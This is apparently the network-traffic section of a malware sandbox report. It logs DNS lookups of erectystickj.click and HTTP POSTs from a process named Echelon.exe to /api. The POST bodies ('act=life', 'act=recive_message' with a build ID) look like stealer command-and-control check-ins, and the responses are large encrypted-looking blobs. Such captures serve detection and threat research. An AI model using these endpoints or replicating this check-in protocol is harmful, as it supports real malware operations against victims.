                                                                                      Dec 23, 2024 02:29:16.322367907 CET44349709172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:16.322446108 CET49709443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:16.323474884 CET49709443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:16.323477983 CET44349709172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:16.323795080 CET44349709172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:16.324877024 CET49709443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:16.325133085 CET49709443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:16.325169086 CET44349709172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:17.230998039 CET44349709172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:17.231112957 CET44349709172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:17.231216908 CET49709443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:17.231345892 CET49709443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:17.231359959 CET44349709172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:17.348571062 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:17.348687887 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:17.348798990 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:17.349147081 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:17.349180937 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:18.572864056 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:18.572983027 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:18.582895041 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:18.582931042 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:18.583307981 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:18.584613085 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:18.584786892 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:18.584829092 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:18.584974051 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:18.631334066 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:19.504622936 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:19.504741907 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:19.504837990 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:19.505059958 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:19.505105019 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:20.379301071 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:20.379334927 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:20.379401922 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:20.379875898 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:20.379892111 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:21.593700886 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:21.593774080 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:21.595704079 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:21.595712900 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:21.595915079 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:21.604265928 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:21.604588985 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:21.604623079 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:21.604886055 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:21.604895115 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:22.566807985 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:22.566890001 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:22.567200899 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:22.567416906 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:22.567428112 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:23.537072897 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:23.537116051 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:23.537172079 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:23.537570000 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:23.537584066 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:24.823754072 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:24.823919058 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:24.825263023 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:24.825273991 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:24.825483084 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:24.832972050 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:24.833085060 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:24.833098888 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:25.618038893 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:25.618129969 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:25.618194103 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:25.621406078 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:25.621431112 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:26.529555082 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:26.529599905 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:26.529695034 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:26.529978037 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:26.529992104 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.744015932 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.744189978 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.745516062 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.745531082 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.745748043 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.747273922 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.747977018 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.748018980 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.748898029 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.748935938 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.749861956 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.749908924 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.750047922 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.750085115 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.750253916 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.750289917 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.750557899 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.750588894 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.750600100 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.750613928 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.750747919 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.750771999 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.750798941 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.750920057 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.750962973 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.791348934 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.791547060 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.791596889 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.791623116 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.791644096 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.791667938 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.791681051 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.791815996 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.791827917 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:30.196225882 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:30.196317911 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:30.196391106 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:30.196628094 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:30.196646929 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:30.227063894 CET49740443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:30.227137089 CET44349740172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:30.227248907 CET49740443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:30.227603912 CET49740443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:30.227634907 CET44349740172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:30.348809958 CET49740443192.168.2.5172.67.154.166
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 23, 2024 02:29:10.379153013 CET5788453192.168.2.51.1.1.1
                                                                                      Dec 23, 2024 02:29:10.707391977 CET53578841.1.1.1192.168.2.5
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Dec 23, 2024 02:29:10.379153013 CET192.168.2.51.1.1.10xa955Standard query (0)erectystickj.clickA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Dec 23, 2024 02:29:10.707391977 CET1.1.1.1192.168.2.50xa955No error (0)erectystickj.click172.67.154.166A (IP address)IN (0x0001)false
                                                                                      Dec 23, 2024 02:29:10.707391977 CET1.1.1.1192.168.2.50xa955No error (0)erectystickj.click104.21.5.142A (IP address)IN (0x0001)false
                                                                                      • erectystickj.click
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.549707172.67.154.1664433356C:\Users\user\Desktop\Echelon.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-23 01:29:12 UTC265OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: erectystickj.click
                                                                                      2024-12-23 01:29:12 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                      Data Ascii: act=life
                                                                                      2024-12-23 01:29:12 UTC1133INHTTP/1.1 200 OK
                                                                                      Date: Mon, 23 Dec 2024 01:29:12 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=83ib779k6tlken3ahkjoina7kb; expires=Thu, 17 Apr 2025 19:15:51 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iHpMnrzS6460W%2BNvUXvIcDlIjjCkbfNewyqgmgbtgkG89BmZZo0xEPbWmb%2Bkq600%2BMrwiXFJF%2BGQxrTBJUp8xhBezpAPDX5u%2FIIdeSgHa2JPsmPaCsrstRlTUL5E4zpTd%2BqXjZQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f64944b5acb42c3-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2068&min_rtt=1759&rtt_var=1279&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=689166&cwnd=203&unsent_bytes=0&cid=3d1e57887dd3716a&ts=764&x=0"
                                                                                      2024-12-23 01:29:12 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                      Data Ascii: 2ok
                                                                                      2024-12-23 01:29:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.549708172.67.154.1664433356C:\Users\user\Desktop\Echelon.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-23 01:29:13 UTC266OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 52
                                                                                      Host: erectystickj.click
                                                                                      2024-12-23 01:29:13 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 31 38 31 36 39 30 36 37 38 35 26 6a 3d
                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--1816906785&j=
                                                                                      2024-12-23 01:29:14 UTC1129INHTTP/1.1 200 OK
                                                                                      Date: Mon, 23 Dec 2024 01:29:14 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=4b42pu59nhbgs3703868cqobhm; expires=Thu, 17 Apr 2025 19:15:53 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FPJ2Z8%2FpgsAkLa6G0KSWngB5JIzNtgu6wMQopN6QyvU5V6UwrkTqxIG92cZN5l3qyGvMYYtDMRrxlIn8i3%2B2ZgbZA1Q%2FAL%2F1CbTLmY5rVwjFtMy0TlqUjymR5j5cnzAn5w4EqVc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6494583bae430e-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1653&rtt_var=640&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=954&delivery_rate=1684939&cwnd=186&unsent_bytes=0&cid=745e0b4eb4b686d9&ts=763&x=0"
                                                                                      2024-12-23 01:29:14 UTC240INData Raw: 34 36 61 0d 0a 6d 66 74 66 71 30 76 35 51 2b 38 2f 30 47 4d 58 68 36 46 59 2b 74 74 2b 44 6b 44 46 77 35 63 31 4c 52 42 53 54 45 42 74 48 58 4c 69 32 53 6d 4a 63 63 31 76 7a 55 79 31 51 53 33 7a 30 79 32 66 39 31 78 76 4a 4f 66 35 38 56 52 42 59 7a 64 67 59 68 74 77 55 4b 4f 64 50 73 63 34 6e 47 2f 4e 57 71 68 42 4c 64 7a 61 65 70 2b 31 58 44 52 69 6f 4b 6e 31 56 45 46 79 4d 79 63 76 48 58 45 52 38 5a 63 34 77 79 36 61 4a 34 35 54 76 51 5a 79 34 73 41 79 6c 4c 49 54 5a 69 33 6e 37 37 56 51 56 7a 4a 6f 62 67 30 49 61 52 50 55 6d 69 7a 41 61 59 52 76 6c 42 32 31 44 54 57 39 67 7a 6d 66 75 52 4a 6f 4a 4b 36 72 2f 31 31 4a 63 7a 59 6d 4d 41 52 37 47 76 47 5a 4f 38 49 6b 6b 7a 4f 44 57 62 6f 4e 64 4f 6a 41 65 74 62
                                                                                      Data Ascii: 46amftfq0v5Q+8/0GMXh6FY+tt+DkDFw5c1LRBSTEBtHXLi2SmJcc1vzUy1QS3z0y2f91xvJOf58VRBYzdgYhtwUKOdPsc4nG/NWqhBLdzaep+1XDRioKn1VEFyMycvHXER8Zc4wy6aJ45TvQZy4sAylLITZi3n77VQVzJobg0IaRPUmizAaYRvlB21DTW9gzmfuRJoJK6r/11JczYmMAR7GvGZO8IkkzODWboNdOjAetb
                                                                                      2024-12-23 01:29:14 UTC897INData Raw: 35 47 33 52 69 2f 2b 47 6d 5a 55 78 6a 49 54 73 76 48 33 6c 51 35 4e 63 6b 69 53 36 58 59 64 55 64 75 67 31 37 34 4d 41 31 6e 37 67 63 66 69 32 6e 6f 76 31 66 53 33 67 2f 49 53 30 42 64 52 66 7a 6b 44 72 47 4c 70 4d 6e 67 6c 37 79 54 7a 58 69 32 33 72 41 2b 54 78 38 49 61 53 31 2b 45 59 50 62 58 34 33 59 67 68 7a 55 4b 50 5a 4f 38 63 6f 6c 69 47 66 56 62 6b 4b 63 50 66 49 4d 35 57 30 48 47 45 6f 71 4b 4c 31 55 45 56 34 50 79 51 6d 41 6e 49 57 2b 35 6c 39 68 32 6d 63 4f 63 30 46 38 69 4a 77 39 63 51 32 6a 76 73 6d 4c 44 33 70 75 4c 56 51 51 7a 4a 6f 62 69 6f 4b 66 42 50 77 6c 6a 37 42 49 6f 6b 68 6e 31 75 2f 42 47 66 6a 78 6a 53 53 75 67 35 6d 4c 4b 47 69 2f 46 78 47 64 7a 63 71 59 6b 45 2f 46 2b 50 5a 5a 59 6b 49 6c 69 71 42 56 36 55 42 4e 66 71 4e 49 39
                                                                                      Data Ascii: 5G3Ri/+GmZUxjITsvH3lQ5NckiS6XYdUdug174MA1n7gcfi2nov1fS3g/IS0BdRfzkDrGLpMngl7yTzXi23rA+Tx8IaS1+EYPbX43YghzUKPZO8coliGfVbkKcPfIM5W0HGEoqKL1UEV4PyQmAnIW+5l9h2mcOc0F8iJw9cQ2jvsmLD3puLVQQzJobioKfBPwlj7BIokhn1u/BGfjxjSSug5mLKGi/FxGdzcqYkE/F+PZZYkIliqBV6UBNfqNI9
                                                                                      2024-12-23 01:29:14 UTC1369INData Raw: 34 34 62 32 0d 0a 75 33 45 6d 73 30 35 37 36 37 54 67 39 31 50 47 35 36 54 33 41 66 39 4a 45 39 79 43 32 57 4a 59 78 51 76 67 68 32 36 63 38 79 6c 62 55 59 59 79 71 76 6f 76 31 46 51 58 77 32 4b 43 49 4b 50 31 36 37 6e 69 57 4a 63 64 73 46 67 30 71 6d 43 6a 66 51 77 44 53 57 76 67 6f 73 50 65 6d 34 74 56 42 44 4d 6d 68 75 4c 41 4a 30 48 50 79 51 50 4d 6f 70 6b 53 2b 43 56 37 6f 4a 64 65 6a 43 4d 5a 43 2f 45 57 63 74 71 4b 62 39 56 45 4e 33 50 53 31 69 51 54 38 58 34 39 6c 6c 69 51 79 56 49 70 78 4d 38 44 52 32 36 38 30 39 6a 76 6b 44 49 6a 76 6e 70 76 6b 58 46 7a 49 36 4b 53 55 4c 63 68 72 34 6e 54 6e 45 4a 70 49 6f 68 45 2b 34 44 58 76 33 7a 6a 43 64 74 78 42 70 4c 61 65 67 39 46 6c 46 65 58 42 67 59 67 68 6e 55 4b 50 5a 45 73 51 35 69 53 75 47 54 50 41
                                                                                      Data Ascii: 44b2u3Ems05767Tg91PG56T3Af9JE9yC2WJYxQvgh26c8ylbUYYyqvov1FQXw2KCIKP167niWJcdsFg0qmCjfQwDSWvgosPem4tVBDMmhuLAJ0HPyQPMopkS+CV7oJdejCMZC/EWctqKb9VEN3PS1iQT8X49lliQyVIpxM8DR26809jvkDIjvnpvkXFzI6KSULchr4nTnEJpIohE+4DXv3zjCdtxBpLaeg9FlFeXBgYghnUKPZEsQ5iSuGTPA
                                                                                      2024-12-23 01:29:14 UTC1369INData Raw: 33 72 41 2b 54 4e 76 4e 4b 33 68 36 68 6c 57 4d 6a 63 69 59 6c 63 2f 47 76 65 64 50 73 55 67 6c 79 79 4d 57 62 55 4d 63 65 58 46 50 4a 32 34 46 32 51 75 71 4b 76 35 55 30 4e 37 4e 69 49 68 44 48 6c 51 74 64 6b 36 30 57 6e 44 59 61 78 51 75 51 31 31 35 74 49 39 32 50 64 63 59 69 53 6e 34 61 31 42 58 32 55 33 4d 57 77 57 50 78 66 33 32 57 57 4a 49 34 6b 6b 67 31 6d 34 42 48 48 70 79 54 71 64 71 78 52 71 4a 61 75 70 38 46 68 4a 64 7a 30 70 4b 51 78 74 41 76 69 64 4d 38 56 70 31 57 47 4b 52 66 4a 5a 4e 63 44 55 4f 59 69 2f 48 79 77 39 36 62 69 31 55 45 4d 79 61 47 34 69 41 58 4d 62 2f 4a 49 32 7a 53 32 62 4c 49 5a 54 76 41 68 35 37 63 38 39 69 72 51 5a 5a 43 69 75 70 50 6c 61 54 47 41 7a 4c 32 4a 42 50 78 66 6a 32 57 57 4a 44 71 67 57 72 68 32 74 54 32 79 6c
                                                                                      Data Ascii: 3rA+TNvNK3h6hlWMjciYlc/GvedPsUglyyMWbUMceXFPJ24F2QuqKv5U0N7NiIhDHlQtdk60WnDYaxQuQ115tI92PdcYiSn4a1BX2U3MWwWPxf32WWJI4kkg1m4BHHpyTqdqxRqJaup8FhJdz0pKQxtAvidM8Vp1WGKRfJZNcDUOYi/Hyw96bi1UEMyaG4iAXMb/JI2zS2bLIZTvAh57c89irQZZCiupPlaTGAzL2JBPxfj2WWJDqgWrh2tT2yl
                                                                                      2024-12-23 01:29:14 UTC1369INData Raw: 46 63 51 43 47 6f 71 72 56 49 41 57 74 77 4b 53 35 50 4a 31 44 38 6b 54 58 48 4b 70 30 71 67 56 47 7a 43 48 50 67 79 7a 32 58 76 68 56 72 49 71 47 7a 38 6c 70 47 63 6a 73 6e 4b 41 74 2b 47 37 76 58 66 63 34 78 32 33 6e 4e 62 37 55 58 5a 65 61 44 4a 64 61 67 58 47 73 75 35 2f 6d 31 57 6c 31 7a 4e 54 77 6d 41 48 51 43 38 4a 38 39 7a 44 75 63 4c 59 64 53 73 51 6c 34 35 73 73 6f 6d 4c 51 63 66 6a 43 68 71 76 73 58 41 54 49 33 4e 6d 4a 58 50 79 48 73 6b 6e 33 57 5a 34 4a 68 69 6c 48 79 57 54 58 6d 79 54 65 57 71 78 68 71 4b 61 53 76 2f 56 4a 48 64 6a 6f 6a 4c 51 52 31 47 66 4f 5a 4d 73 77 68 6b 43 65 44 58 4c 51 4e 65 4b 57 4e 65 70 2b 68 58 44 52 69 67 4c 76 34 55 56 68 6a 42 53 6b 69 58 6a 38 50 74 59 42 39 7a 69 58 62 65 63 31 51 76 67 74 34 34 4d 63 79 6e
                                                                                      Data Ascii: FcQCGoqrVIAWtwKS5PJ1D8kTXHKp0qgVGzCHPgyz2XvhVrIqGz8lpGcjsnKAt+G7vXfc4x23nNb7UXZeaDJdagXGsu5/m1Wl1zNTwmAHQC8J89zDucLYdSsQl45ssomLQcfjChqvsXATI3NmJXPyHskn3WZ4JhilHyWTXmyTeWqxhqKaSv/VJHdjojLQR1GfOZMswhkCeDXLQNeKWNep+hXDRigLv4UVhjBSkiXj8PtYB9ziXbec1Qvgt44Mcyn
                                                                                      2024-12-23 01:29:14 UTC1369INData Raw: 37 35 36 62 35 46 78 63 79 50 69 4d 6b 44 6e 34 59 38 35 6b 37 77 79 32 59 4b 49 35 61 75 77 64 2b 35 73 6b 31 6e 37 38 59 62 43 6d 67 72 2f 4e 53 52 48 74 77 59 47 49 49 5a 31 43 6a 32 52 76 71 4f 34 6b 54 67 31 36 70 51 57 71 72 32 6e 71 66 74 56 77 30 59 71 79 70 2b 6b 56 4b 65 7a 67 71 4b 77 39 37 47 76 61 65 50 63 77 6b 6e 69 57 44 57 62 55 42 65 65 72 45 4d 70 65 39 48 47 4e 69 36 65 48 79 54 77 38 71 63 41 34 70 47 56 34 65 38 49 74 39 31 6d 65 43 59 59 70 52 38 6c 6b 31 36 38 6f 37 6b 4c 63 51 5a 43 61 31 6f 66 35 65 51 48 4d 2f 4c 69 45 4f 64 52 6a 70 6e 7a 33 43 49 5a 77 70 69 56 4f 67 41 48 71 6c 6a 58 71 66 6f 56 77 30 59 70 61 33 38 6c 42 41 4d 42 6b 70 4f 51 35 31 45 2f 43 56 66 64 5a 6e 67 6d 47 4b 55 66 4a 5a 4e 65 6a 50 4e 35 79 72 45 47
                                                                                      Data Ascii: 756b5FxcyPiMkDn4Y85k7wy2YKI5auwd+5sk1n78YbCmgr/NSRHtwYGIIZ1Cj2RvqO4kTg16pQWqr2nqftVw0Yqyp+kVKezgqKw97GvaePcwkniWDWbUBeerEMpe9HGNi6eHyTw8qcA4pGV4e8It91meCYYpR8lk168o7kLcQZCa1of5eQHM/LiEOdRjpnz3CIZwpiVOgAHqljXqfoVw0Ypa38lBAMBkpOQ51E/CVfdZngmGKUfJZNejPN5yrEG
                                                                                      2024-12-23 01:29:14 UTC1369INData Raw: 72 52 64 45 66 44 55 76 4c 67 56 34 48 75 6d 59 4e 38 55 6f 6e 43 61 47 54 37 6b 54 66 75 33 41 4e 4a 43 77 48 47 49 69 70 71 7a 31 46 77 45 79 4e 7a 5a 69 56 7a 38 31 32 49 34 72 77 32 75 34 4e 70 74 58 74 51 31 6a 37 73 49 35 6a 72 51 4d 4c 47 7a 6e 73 50 4a 47 44 79 6f 6d 50 6a 55 49 59 46 37 69 32 54 72 46 61 63 4e 68 68 6c 4b 38 44 48 37 68 79 6a 2b 51 75 68 6c 70 4b 4b 75 74 39 46 39 47 65 44 55 72 4a 41 56 38 48 76 53 59 4d 63 30 67 6c 53 6a 4e 45 2f 49 47 62 61 57 62 65 71 36 70 47 33 51 76 74 2b 50 48 56 46 35 6a 4a 53 4d 79 43 54 30 2f 2b 4a 55 2b 7a 43 36 4c 59 5a 49 54 71 30 46 79 36 59 4e 69 32 4c 6b 59 59 43 47 67 72 2f 70 61 51 48 55 37 49 53 67 42 62 52 2f 2b 6b 54 48 42 4a 49 6b 72 68 30 2b 37 43 48 6a 72 79 79 69 62 2b 56 49 73 4a 62 2f
                                                                                      Data Ascii: rRdEfDUvLgV4HumYN8UonCaGT7kTfu3ANJCwHGIipqz1FwEyNzZiVz812I4rw2u4NptXtQ1j7sI5jrQMLGznsPJGDyomPjUIYF7i2TrFacNhhlK8DH7hyj+QuhlpKKut9F9GeDUrJAV8HvSYMc0glSjNE/IGbaWbeq6pG3Qvt+PHVF5jJSMyCT0/+JU+zC6LYZITq0Fy6YNi2LkYYCGgr/paQHU7ISgBbR/+kTHBJIkrh0+7CHjryyib+VIsJb/
